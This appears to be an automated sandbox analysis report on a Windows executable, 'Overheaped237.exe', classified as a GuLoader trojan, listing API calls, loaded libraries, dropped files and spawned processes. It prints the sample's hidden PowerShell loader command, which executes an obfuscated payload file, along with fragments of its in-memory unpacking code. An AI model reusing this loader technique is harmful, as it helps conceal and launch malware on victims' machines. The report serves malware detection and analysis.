Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040322B

Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_004049F9	0_2_004049F9
Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_004064AE	0_2_004064AE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327CA09	7_2_0327CA09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327C147	7_2_0327C147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327C738	7_2_0327C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327CFA9	7_2_0327CFA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327CCD9	7_2_0327CCD9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327537B	7_2_0327537B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032729E0	7_2_032729E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_03276FC8	7_2_03276FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_03273E09	7_2_03273E09

Source: Overheaped237.exe

Static PE information: invalid certificate

Source: Overheaped237.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/14@4/4

Source: C:\Users\user\Desktop\Overheaped237.exe

0_2_0040322B

Source: C:\Users\user\Desktop\Overheaped237.exe

Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404486

Source: C:\Users\user\Desktop\Overheaped237.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\Overheaped237.exe

File created: C:\Users\user\AppData\Roaming\china

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03

Source: C:\Users\user\Desktop\Overheaped237.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsc1A3C.tmp

Jump to behavior

Source: Overheaped237.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Overheaped237.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Overheaped237.exe	Virustotal: Detection: 15%
Source: Overheaped237.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\Overheaped237.exe

File read: C:\Users\user\Desktop\Overheaped237.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Overheaped237.exe "C:\Users\user\Desktop\Overheaped237.exe"
Source: C:\Users\user\Desktop\Overheaped237.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Overheaped237.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: justifikationssager.lnk.0.dr

LNK file: ..\..\..\..\..\Filial195.plo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Overheaped237.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2072840579.0000000006D45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2072840579.0000000006C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb* source: powershell.exe, 00000002.00000002.2072840579.0000000006D45000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2079055968.000000000CA7F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gearvlgeres $Paratherian $Gangbesvr), (Camphoryl @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:stumpiness = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hestehaarsbetrkkene)), $Drevel).DefineDynamicModule($Lnders, $false).DefineType($jundying, $Crooning, [System.MulticastDelegate])$Brnd

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Overheaped237.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "
Source: C:\Users\user\Desktop\Overheaped237.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0078E9F9 push eax; mov dword ptr [esp], edx	2_2_0078EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_06F1ED99 pushad ; ret	2_2_06F1ED9D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0327891E pushad ; iretd	7_2_0327891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_03278DDF push esp; iretd	7_2_03278DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_03278C2F pushfd ; iretd	7_2_03278C30

Source: C:\Users\user\Desktop\Overheaped237.exe

File created: C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overheaped237.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
